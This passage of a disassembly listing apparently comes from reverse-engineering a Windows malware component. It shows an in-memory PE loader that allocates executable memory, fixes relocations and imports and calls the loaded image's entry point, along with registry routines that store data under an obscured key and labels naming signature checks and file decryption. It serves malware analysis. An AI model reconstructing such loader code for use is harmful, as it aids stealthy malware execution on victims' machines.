cmp [ebp+78h+var_14], 2
jnb short loc_9A817F
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A8172: ; CODE XREF: sub_9A812E+39�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A817F
cmp [ebp+78h+var_14], 0
jz short loc_9A81AD
loc_9A817F: ; CODE XREF: sub_9A812E:loc_9A8159�j
; sub_9A812E+40�j ...
lea eax, [ebp+78h+InBuffer]
push eax
push 10000000h
call sub_9A7E49
test eax, eax
pop ecx
pop ecx
jz short loc_9A81AB
lea eax, [ebp+78h+InBuffer]
push eax ; lpInBuffer
push 1000h ; nNumberOfBytesToWrite
push offset aServicew ; "ServiceW"
call sub_9A7F9D
add esp, 0Ch
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A81AB: ; CODE XREF: sub_9A812E+1E�j
; sub_9A812E+63�j
xor eax, eax
loc_9A81AD: ; CODE XREF: sub_9A812E+29�j
; sub_9A812E+34�j ...
add ebp, 78h
leave
retn
sub_9A812E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A81B2(void *Src,int,int,int)
sub_9A81B2 proc near ; CODE XREF: sub_check_signature_and_create_process_from_file+7F�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hModule = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+Src]
cmp word ptr [edi], 5A4Dh
jz short loc_9A81CA
xor eax, eax
jmp loc_9A8393
; ---------------------------------------------------------------------------
loc_9A81CA: ; CODE XREF: sub_9A81B2+F�j
mov eax, [ebp+arg_4]
push esi
mov esi, [edi+3Ch]
add eax, 0FFFFFFFCh
cmp esi, eax
jbe short loc_9A81DF
loc_9A81D8: ; CODE XREF: sub_9A81B2+35�j
; sub_9A81B2+3B�j
xor eax, eax
jmp loc_9A8392
; ---------------------------------------------------------------------------
loc_9A81DF: ; CODE XREF: sub_9A81B2+24�j
add esi, edi
cmp dword ptr [esi], 4550h
jnz short loc_9A81D8
cmp dword ptr [esi+28h], 0
jz short loc_9A81D8
push ebx
push 40h ; flProtect
push 101000h ; flAllocationType
push dword ptr [esi+50h] ; dwSize
push 0 ; lpAddress
call ds:VirtualAlloc
mov ebx, eax
test ebx, ebx
jnz short loc_9A820F
loc_9A8208: ; CODE XREF: sub_9A81B2+1D8�j
xor eax, eax
jmp loc_9A8391
; ---------------------------------------------------------------------------
loc_9A820F: ; CODE XREF: sub_9A81B2+54�j
cmp [ebp+arg_8], 0
jz short loc_9A8254
push 40h ; Size
push edi ; Src
push ebx ; Dst
call memcpy
mov eax, [edi+3Ch]
push 0F8h ; Size
add eax, ebx
push esi ; Src
push eax ; Dst
call memcpy
movzx eax, word ptr [esi+6]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; Size
lea eax, [esi+0F8h]
push eax ; Src
mov eax, [edi+3Ch]
lea eax, [eax+ebx+0F8h]
push eax ; Dst
call memcpy
add esp, 24h
loc_9A8254: ; CODE XREF: sub_9A81B2+61�j
and [ebp+var_4], 0
cmp word ptr [esi+6], 0
jbe short loc_9A828B
lea edi, [esi+10Ch]
loc_9A8265: ; CODE XREF: sub_9A81B2+D7�j
mov eax, [edi]
add eax, [ebp+Src]
push dword ptr [edi-0Ch] ; Size
push eax ; Src
mov eax, [edi-8]
add eax, ebx
push eax ; Dst
call memcpy
movzx eax, word ptr [esi+6]
add esp, 0Ch
inc [ebp+var_4]
add edi, 28h
cmp [ebp+var_4], eax
jb short loc_9A8265
loc_9A828B: ; CODE XREF: sub_9A81B2+AB�j
mov eax, [esi+0A0h]
mov edx, ebx
sub edx, [esi+34h]
jz short loc_9A82A0
test eax, eax
jz loc_9A837C
loc_9A82A0: ; CODE XREF: sub_9A81B2+E4�j
add eax, ebx
cmp dword ptr [esi+0A4h], 0
mov [ebp+var_C], eax
jbe short loc_9A82EB
loc_9A82AE: ; CODE XREF: sub_9A81B2+137�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
lea edi, [eax+8]
jz short loc_9A82DB
mov [ebp+Src], ecx
loc_9A82BE: ; CODE XREF: sub_9A81B2+127�j
xor ecx, ecx
mov cx, [edi]
test ch, 0F0h
jz short loc_9A82D4
and ecx, 0FFFh
add ecx, ebx
add ecx, [eax]
add [ecx], edx
loc_9A82D4: ; CODE XREF: sub_9A81B2+114�j
inc edi
inc edi
dec [ebp+Src]
jnz short loc_9A82BE
loc_9A82DB: ; CODE XREF: sub_9A81B2+107�j
add eax, [eax+4]
mov ecx, eax
sub ecx, [ebp+var_C]
cmp ecx, [esi+0A4h]
jb short loc_9A82AE
loc_9A82EB: ; CODE XREF: sub_9A81B2+FA�j
lea eax, [esi+80h]
test eax, eax
jz short loc_9A836B
mov edi, [eax]
add edi, ebx
jmp short loc_9A8364
; ---------------------------------------------------------------------------
loc_9A82FB: ; CODE XREF: sub_9A81B2+1B7�j
add eax, ebx
push eax ; lpLibFileName
call ds:LoadLibraryA
mov [ebp+hModule], eax
mov eax, [edi+10h]
add eax, ebx
xor ecx, ecx
cmp [edi+4], ecx
mov [ebp+var_10], eax
jnz short loc_9A831A
mov eax, [edi]
add eax, ebx
loc_9A831A: ; CODE XREF: sub_9A81B2+162�j
cmp [eax], ecx
mov [ebp+var_4], eax
mov [ebp+Src], ecx
jz short loc_9A8361
mov [ebp+var_C], ecx
loc_9A8327: ; CODE XREF: sub_9A81B2+1AD�j
mov eax, [eax]
test eax, eax
jns short loc_9A8334
and eax, 0FFFFh
jmp short loc_9A8338
; ---------------------------------------------------------------------------
loc_9A8334: ; CODE XREF: sub_9A81B2+179�j
lea eax, [eax+ebx+2]
loc_9A8338: ; CODE XREF: sub_9A81B2+180�j
push eax ; lpProcName
push [ebp+hModule] ; hModule
call ds:GetProcAddress
mov ecx, [ebp+var_C]
mov edx, [ebp+var_10]
inc [ebp+Src]
mov [ecx+edx], eax
mov eax, [ebp+Src]
mov ecx, [ebp+var_4]
shl eax, 2
mov [ebp+var_C], eax
add eax, ecx
cmp dword ptr [eax], 0
jnz short loc_9A8327
loc_9A8361: ; CODE XREF: sub_9A81B2+170�j
add edi, 14h
loc_9A8364: ; CODE XREF: sub_9A81B2+147�j
mov eax, [edi+0Ch]
test eax, eax
jnz short loc_9A82FB
loc_9A836B: ; CODE XREF: sub_9A81B2+141�j
push [ebp+arg_C]
mov esi, [esi+28h]
push 1
add esi, ebx
push ebx
call esi
test eax, eax
jnz short loc_9A838F
loc_9A837C: ; CODE XREF: sub_9A81B2+E8�j
push 8000h ; dwFreeType
push 0 ; dwSize
push ebx ; lpAddress
call ds:VirtualFree
jmp loc_9A8208
; ---------------------------------------------------------------------------
loc_9A838F: ; CODE XREF: sub_9A81B2+1C8�j
mov eax, ebx
loc_9A8391: ; CODE XREF: sub_9A81B2+58�j
pop ebx
loc_9A8392: ; CODE XREF: sub_9A81B2+28�j
pop esi
loc_9A8393: ; CODE XREF: sub_9A81B2+13�j
pop edi
leave
retn
sub_9A81B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8396 proc near ; CODE XREF: sub_Query_registry_Values+14�p
; sub_Query_registry_Values+2E�p
var_8 = dword ptr -8
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push edi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20019h ; samDesired
xor edi, edi
push edi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
mov [ebp+var_8], edi
push [ebp+hKey] ; hKey
call ds:RegOpenKeyExA
test eax, eax
jnz short loc_9A8413
push esi
mov esi, ds:RegQueryValueExA
push ebx ; lpcbData
push edi ; lpData
push edi ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_9A8409
push dword ptr [ebx] ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
cmp eax, edi
mov ecx, [ebp+arg_C]
mov [ecx], eax
jz short loc_9A8409
push ebx ; lpcbData
push eax ; lpData
push edi ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_9A83FE
mov [ebp+var_8], 1
jmp short loc_9A8409
; ---------------------------------------------------------------------------
loc_9A83FE: ; CODE XREF: sub_9A8396+5D�j
mov eax, [ebp+arg_C]
push dword ptr [eax] ; hMem
call ds:GlobalFree
loc_9A8409: ; CODE XREF: sub_9A8396+3A�j
; sub_9A8396+4D�j ...
push [ebp+phkResult] ; hKey
call ds:RegCloseKey
pop esi
loc_9A8413: ; CODE XREF: sub_9A8396+23�j
mov eax, [ebp+var_8]
pop edi
leave
retn
sub_9A8396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8419(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData)
sub_9A8419 proc near ; CODE XREF: sub_Set_registry_Values+15�p
; sub_Set_registry_Values+2D�p
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20006h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call ds:RegOpenKeyExA
test eax, eax
jnz short loc_9A845D
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push 3 ; dwType
push esi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call ds:RegSetValueExA
test eax, eax
jnz short loc_9A8454
inc esi
loc_9A8454: ; CODE XREF: sub_9A8419+38�j
push [ebp+phkResult] ; hKey
call ds:RegCloseKey
loc_9A845D: ; CODE XREF: sub_9A8419+1F�j
mov eax, esi
pop esi
leave
retn
sub_9A8419 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_Query_registry_Values proc near ; CODE XREF: sub_9A84E1+17�p
; sub_InitializeCriticalSection_decrypt_files+3E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push [ebp+arg_8]
mov ebx, eax
push [ebp+arg_4]
push [ebp+arg_0]
push 80000001h
call sub_9A8396
add esp, 10h
test eax, eax
jnz short loc_9A849A
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 80000002h
call sub_9A8396
add esp, 10h
jmp short loc_9A849D
; ---------------------------------------------------------------------------
loc_9A849A: ; CODE XREF: sub_Query_registry_Values+1E�j
xor eax, eax
inc eax
loc_9A849D: ; CODE XREF: sub_Query_registry_Values+36�j
pop ebx
pop ebp
retn
sub_Query_registry_Values endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_Set_registry_Values(LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData)
sub_Set_registry_Values proc near ; CODE XREF: sub_9A8579+75�p
; sub_Call_Set_registry_Values+12�p
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
lpData = dword ptr 10h
cbData = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+lpValueName] ; lpValueName
push [ebp+lpSubKey] ; lpSubKey
push 80000001h ; hKey
call sub_9A8419
push [ebp+cbData] ; cbData
mov esi, eax
push [ebp+lpData] ; lpData
push [ebp+lpValueName] ; lpValueName
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call sub_9A8419
add esp, 28h
test eax, eax
jz short loc_9A84DC
xor esi, esi
inc esi
loc_9A84DC: ; CODE XREF: sub_Set_registry_Values+37�j
mov eax, esi
pop esi
pop ebp
retn
sub_Set_registry_Values endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A84E1 proc near ; CODE XREF: sub_InitializeCriticalSection_decrypt_files+25�p
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+hMem]
push eax
push (offset aPurlmon_dll+9)
push offset aStance ; "stance"
lea eax, [ebp+var_10]
call sub_Query_registry_Values
add esp, 0Ch
test eax, eax
jnz short loc_9A8507
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A8507: ; CODE XREF: sub_9A84E1+21�j
push esi
mov esi, [ebp+hMem]
mov eax, [esi]
lea ecx, [eax+eax*2]
lea ecx, ds:4[ecx*4]
cmp [ebp+var_10], ecx
jz short loc_9A8520
xor eax, eax
jmp short loc_9A8576
; ---------------------------------------------------------------------------
loc_9A8520: ; CODE XREF: sub_9A84E1+39�j
and [ebp+var_8], 0
test eax, eax
jbe short loc_9A8565
lea eax, [esi+4]
mov [ebp+var_4], eax
push edi
loc_9A852F: ; CODE XREF: sub_9A84E1+81�j
push 14h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
test eax, eax
jz short loc_9A8556
mov esi, [ebp+var_4]
lea edi, [eax+8]
movsd
movsd
movsd
mov ecx, [ebx+4]
mov esi, [ebp+hMem]
mov [eax], ebx
mov [eax+4], ecx
mov [ecx], eax
mov [ebx+4], eax
loc_9A8556: ; CODE XREF: sub_9A84E1+5A�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add [ebp+var_4], 0Ch
cmp eax, [esi]
jb short loc_9A852F
pop edi
loc_9A8565: ; CODE XREF: sub_9A84E1+45�j
mov eax, [esi]
mov ecx, [ebp+arg_0]
push esi ; hMem
mov [ecx], eax
call ds:GlobalFree
xor eax, eax
inc eax
loc_9A8576: ; CODE XREF: sub_9A84E1+3D�j
pop esi
leave
retn
sub_9A84E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8579 proc near ; CODE XREF: sub_9A8BC6+33�p
; sub_9A8C17+2D�p
cbData = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_4]
lea eax, [esi+esi*2]
lea eax, ds:4[eax*4]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+cbData], eax
call ds:GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9A8602
mov edx, [ebp+arg_0]
mov [ebx], esi
mov eax, [edx]
push edi
lea esi, [eax+8]
lea edi, [ebx+4]
movsd
xor ecx, ecx
movsd
inc ecx
cmp [ebp+arg_4], ecx
movsd
jbe short loc_9A85E0
lea esi, [ebx+10h]
mov [ebp+var_4], esi
loc_9A85BE: ; CODE XREF: sub_9A8579+5C�j
mov eax, [eax]
cmp eax, edx
jz short loc_9A85D9
mov edi, [ebp+var_4]
add [ebp+var_4], 0Ch
lea esi, [eax+8]
movsd
movsd
inc ecx
cmp ecx, [ebp+arg_4]
movsd
jb short loc_9A85BE
jmp short loc_9A85E0
; ---------------------------------------------------------------------------
loc_9A85D9: ; CODE XREF: sub_9A8579+49�j
cmp ecx, [ebp+arg_4]
jz short loc_9A85E0
mov [ebx], ecx
loc_9A85E0: ; CODE XREF: sub_9A8579+3D�j
; sub_9A8579+5E�j ...
push [ebp+cbData] ; cbData
push ebx ; lpData
push (offset aPurlmon_dll+9) ; lpValueName
push offset aStance ; "stance"
call sub_Set_registry_Values
add esp, 10h
push ebx ; hMem
mov esi, eax
call ds:GlobalFree
mov eax, esi
pop edi
loc_9A8602: ; CODE XREF: sub_9A8579+24�j
pop esi
pop ebx
leave
retn
sub_9A8579 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8606(LPFILETIME lpFileTime)
sub_9A8606 proc near ; CODE XREF: sub_9A8625+3B�p
; sub_9A87A6+9�p
SystemTime = _SYSTEMTIME ptr -10h
lpFileTime = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call ds:GetSystemTime
push [ebp+lpFileTime] ; lpFileTime
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call ds:SystemTimeToFileTime
leave
retn
sub_9A8606 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8625 proc near ; CODE XREF: sub_9A8C17+1F�p
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [esi]
jmp short loc_9A8635
; ---------------------------------------------------------------------------
loc_9A862E: ; CODE XREF: sub_9A8625+12�j
cmp [eax+8], ebx
jz short loc_9A863B
mov eax, [eax]
loc_9A8635: ; CODE XREF: sub_9A8625+7�j
cmp eax, esi
jnz short loc_9A862E
xor eax, eax
loc_9A863B: ; CODE XREF: sub_9A8625+C�j
test eax, eax
jz short loc_9A865C
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
mov [ecx+4], edx
mov ecx, [esi]
mov [eax], ecx
mov [eax+4], esi
mov [esi], eax
mov [eax+4], eax
jmp short loc_9A8693
; ---------------------------------------------------------------------------
loc_9A865C: ; CODE XREF: sub_9A8625+18�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
call sub_9A8606
pop ecx
push 14h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
test eax, eax
jnz short loc_9A8676
leave
retn
; ---------------------------------------------------------------------------
loc_9A8676: ; CODE XREF: sub_9A8625+4D�j
mov [eax+8], ebx
mov ecx, [ebp+FileTime.dwLowDateTime]
mov [eax+0Ch], ecx
mov ecx, [ebp+FileTime.dwHighDateTime]
mov [eax+10h], ecx
mov ecx, [esi]
mov [eax], ecx
mov [eax+4], esi
mov [ecx+4], eax
mov [esi], eax
inc dword ptr [edi]
loc_9A8693: ; CODE XREF: sub_9A8625+35�j
xor eax, eax
inc eax
leave
retn
sub_9A8625 endp
; =============== S U B R O U T I N E =======================================
sub_9A8698 proc near ; CODE XREF: sub_InitializeCriticalSection_decrypt_files+69�p
arg_0 = dword ptr 4
push 0Ch ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
xor ecx, ecx
cmp eax, ecx
jz short loc_9A86BA
mov [eax], ecx
mov [eax+8], ecx
mov [eax+4], ecx
mov ecx, [esp+arg_0]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A86BA: ; CODE XREF: sub_9A8698+E�j
xor eax, eax
retn
sub_9A8698 endp
; =============== S U B R O U T I N E =======================================
sub_9A86BD proc near ; CODE XREF: sub_9A86E4+10�p
; sub_check_signature_and_create_process_from_file+20�p
arg_0 = dword ptr 4
mov eax, [edi+10h]
add eax, 14h
push eax ; dwBytes
push 40h ; uFlags
mov [esi], eax
call ds:GlobalAlloc
mov ecx, [esp+arg_0]
mov [ecx], eax
push dword ptr [esi] ; Size
push edi ; Src
push eax ; Dst
call memcpy
xor eax, eax
add esp, 0Ch
inc eax
retn
sub_9A86BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A86E4 proc near ; CODE XREF: sub_9A8745+2E�p
Size = dword ptr -8
hMem = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
lea eax, [ebp+hMem]
push eax
lea esi, [ebp+Size]
mov edi, ecx
call sub_9A86BD
test eax, eax
pop ecx
jz short loc_9A8741
mov esi, [ebp+hMem]
mov eax, [esi+10h]
lea ecx, [eax-200h]
push ecx ; int
lea ecx, [esi+14h]
push ecx ; int
lea eax, [eax+esi-1ECh]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_check_file_signature
push [ebp+Size] ; Size
movzx edi, al
push 0 ; Val
push esi ; Dst
call memset
add esp, 20h
push esi ; hMem
call ds:GlobalFree
mov eax, edi
loc_9A8741: ; CODE XREF: sub_9A86E4+18�j
pop edi
pop esi
leave
retn
sub_9A86E4 endp
; =============== S U B R O U T I N E =======================================
sub_9A8745 proc near ; CODE XREF: sub_9A8AD0+D�p
; sub_InitializeCriticalSection_decrypt_files+50�p
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
xor esi, esi
cmp [esp+8+arg_0], 0Ch
jbe short loc_9A8787
mov eax, [edi+4]
add eax, 0Ch
cmp eax, [esp+8+arg_0]
jnz short loc_9A8787
cmp [edi], ebx
jbe short loc_9A8781
loc_9A8762: ; CODE XREF: sub_9A8745+3A�j
lea ecx, [edi+esi+0Ch]
mov eax, [ecx+10h]
lea esi, [esi+eax+14h]
cmp esi, [esp+8+arg_0]
ja short loc_9A8787
call sub_9A86E4
test eax, eax
jz short loc_9A8787
inc ebx
cmp ebx, [edi]
jb short loc_9A8762
loc_9A8781: ; CODE XREF: sub_9A8745+1B�j
xor eax, eax
inc eax
loc_9A8784: ; CODE XREF: sub_9A8745+44�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9A8787: ; CODE XREF: sub_9A8745+B�j
; sub_9A8745+17�j ...
xor eax, eax
jmp short loc_9A8784
sub_9A8745 endp
; =============== S U B R O U T I N E =======================================
sub_Call_Set_registry_Values proc near ; CODE XREF: sub_9A8AD0+3F�p
; sub_9A8AD0+58�p ...
mov ecx, [eax+4]
add ecx, 0Ch
push ecx ; cbData
push eax ; lpData
push offset dword_9A2650 ; lpValueName
push offset byte_9A261C ; lpSubKey
call sub_Set_registry_Values
add esp, 10h
retn
sub_Call_Set_registry_Values endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A87A6 proc near ; CODE XREF: sub_9A8881+25�p
; sub_9A8881+76�p ...
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+FileTime]
push eax ; lpFileTime
call sub_9A8606
mov eax, [ebp+FileTime.dwHighDateTime]
cmp eax, [esi+0Ch]
pop ecx
jb short loc_9A87CC
ja short loc_9A87C7
mov eax, [ebp+FileTime.dwLowDateTime]
cmp eax, [esi+8]
jbe short loc_9A87CC
loc_9A87C7: ; CODE XREF: sub_9A87A6+17�j
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A87CC: ; CODE XREF: sub_9A87A6+15�j
; sub_9A87A6+1F�j
xor eax, eax
leave
retn
sub_9A87A6 endp
; =============== S U B R O U T I N E =======================================
sub_9A87D0 proc near ; CODE XREF: sub_9A87FB+9�p
; sub_9A8948+22�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [edx]
push edi
xor edi, edi
xor ecx, ecx
test esi, esi
jbe short loc_9A87F5
loc_9A87DD: ; CODE XREF: sub_9A87D0+23�j
lea eax, [edx+ecx+0Ch]
mov ebx, [eax]
cmp ebx, [esp+0Ch+arg_0]
jz short loc_9A87F7
mov eax, [eax+10h]
inc edi
cmp edi, esi
lea ecx, [ecx+eax+14h]
jb short loc_9A87DD
loc_9A87F5: ; CODE XREF: sub_9A87D0+B�j
xor eax, eax
loc_9A87F7: ; CODE XREF: sub_9A87D0+17�j
pop edi
pop esi
pop ebx
retn
sub_9A87D0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A87FB(void *Src)
sub_9A87FB proc near ; CODE XREF: sub_9A8881+8D�p
; sub_9A8948+30�p
Src = dword ptr 4
mov edx, [esi]
push edi
mov edi, [esp+4+Src]
push dword ptr [edi]
call sub_9A87D0
test eax, eax
pop ecx
jz short loc_9A8812
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_9A8812: ; CODE XREF: sub_9A87FB+11�j
mov eax, [edx+4]
push ebx
mov ebx, [edi+10h]
add ebx, 14h
lea eax, [eax+ebx+0Ch]
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov edi, eax
test edi, edi
jz short loc_9A887E
mov eax, [esi]
mov eax, [eax]
inc eax
mov [edi], eax
mov eax, [esi]
mov eax, [eax+8]
mov [edi+8], eax
mov eax, [esi]
mov eax, [eax+4]
add eax, ebx
mov [edi+4], eax
mov eax, [esi]
push dword ptr [eax+4] ; Size
add eax, 0Ch
push eax ; Src
lea eax, [edi+0Ch]
push eax ; Dst
call memcpy
mov eax, [esi]
mov eax, [eax+4]
push ebx ; Size
push [esp+18h+Src] ; Src
lea eax, [eax+edi+0Ch]
push eax ; Dst
call memcpy
add esp, 18h
push dword ptr [esi] ; hMem
call ds:GlobalFree
xor eax, eax
mov [esi], edi
inc eax
loc_9A887E: ; CODE XREF: sub_9A87FB+32�j
pop ebx
pop edi
retn
sub_9A87FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8881 proc near ; CODE XREF: sub_9A8948+54�p
hMem = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [edi]
push ebx
xor ebx, ebx
cmp [eax], ebx
push esi
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A88BC
loc_9A8897: ; CODE XREF: sub_9A8881+37�j
mov eax, [edi]
mov ecx, [ebp+var_4]
lea esi, [eax+ecx+0Ch]
mov ebx, [esi+10h]
add ebx, 14h
call sub_9A87A6
add [ebp+var_4], ebx
inc [ebp+var_8]
mov eax, [edi]
mov ecx, [ebp+var_8]
cmp ecx, [eax]
jb short loc_9A8897
xor ebx, ebx
loc_9A88BC: ; CODE XREF: sub_9A8881+14�j
push 0Ch ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
cmp esi, ebx
mov [ebp+hMem], esi
jz short loc_9A8944
mov [esi], ebx
mov [esi+4], ebx
mov eax, [edi]
mov eax, [eax+8]
mov [esi+8], eax
mov eax, [edi]
cmp [eax], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A892A
loc_9A88E8: ; CODE XREF: sub_9A8881+A4�j
mov eax, [edi]
mov ecx, [ebp+var_4]
lea esi, [eax+ecx+0Ch]
mov ebx, [esi+10h]
add ebx, 14h
call sub_9A87A6
test eax, eax
jnz short loc_9A8918
mov eax, [edi]
mov ecx, [esi+4]
cmp ecx, [eax+8]
jb short loc_9A8918
push esi ; Src
lea esi, [ebp+hMem]
call sub_9A87FB
test eax, eax
pop ecx
jz short loc_9A893B
loc_9A8918: ; CODE XREF: sub_9A8881+7D�j
; sub_9A8881+87�j
add [ebp+var_4], ebx
inc [ebp+var_8]
mov eax, [edi]
mov ecx, [ebp+var_8]
cmp ecx, [eax]
jb short loc_9A88E8
mov esi, [ebp+hMem]
loc_9A892A: ; CODE XREF: sub_9A8881+65�j
push dword ptr [edi] ; hMem
call ds:GlobalFree
xor eax, eax
mov [edi], esi
inc eax
loc_9A8937: ; CODE XREF: sub_9A8881+C5�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9A893B: ; CODE XREF: sub_9A8881+95�j
push [ebp+hMem] ; hMem
call ds:GlobalFree
loc_9A8944: ; CODE XREF: sub_9A8881+4C�j
xor eax, eax
jmp short loc_9A8937
sub_9A8881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8948 proc near ; CODE XREF: sub_9A8AD0+49�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp [esi], ebx
push edi
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A8999
loc_9A895F: ; CODE XREF: sub_9A8948+4F�j
mov eax, [ebp+arg_0]
mov edx, [eax]
lea edi, [esi+ebx+0Ch]
push dword ptr [edi]
call sub_9A87D0
test eax, eax
pop ecx
jnz short loc_9A8988
mov esi, [ebp+arg_0]
push edi ; Src
call sub_9A87FB
mov esi, [ebp+arg_4]
pop ecx
mov [ebp+var_8], 1
loc_9A8988: ; CODE XREF: sub_9A8948+2A�j
mov eax, [edi+10h]
inc [ebp+var_4]
lea ebx, [ebx+eax+14h]
mov eax, [ebp+var_4]
cmp eax, [esi]
jb short loc_9A895F
loc_9A8999: ; CODE XREF: sub_9A8948+15�j
mov edi, [ebp+arg_0]
call sub_9A8881
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn
sub_9A8948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_check_signature_and_create_process_from_file proc near ; CODE XREF: sub_9A8A65+39�p
Size = dword ptr -8
hMem = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push edi
mov edi, eax
cmp dword ptr [edi+10h], 200h
ja short loc_9A89C1
xor eax, eax
jmp loc_9A8A62
; ---------------------------------------------------------------------------
loc_9A89C1: ; CODE XREF: sub_check_signature_and_create_process_from_file+F�j
push esi
lea eax, [ebp+hMem]
push eax
lea esi, [ebp+Size]
call sub_9A86BD
test eax, eax
pop ecx
jz loc_9A8A61
mov edi, [ebp+hMem]
mov eax, [edi+10h]
lea ecx, [eax-200h]
push ecx ; int
lea esi, [edi+14h]
push esi ; int
lea eax, [eax+edi-1ECh]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_check_file_signature
add esp, 14h
test al, al
jnz short loc_9A8A0B
xor esi, esi
jmp short loc_9A8A58
; ---------------------------------------------------------------------------
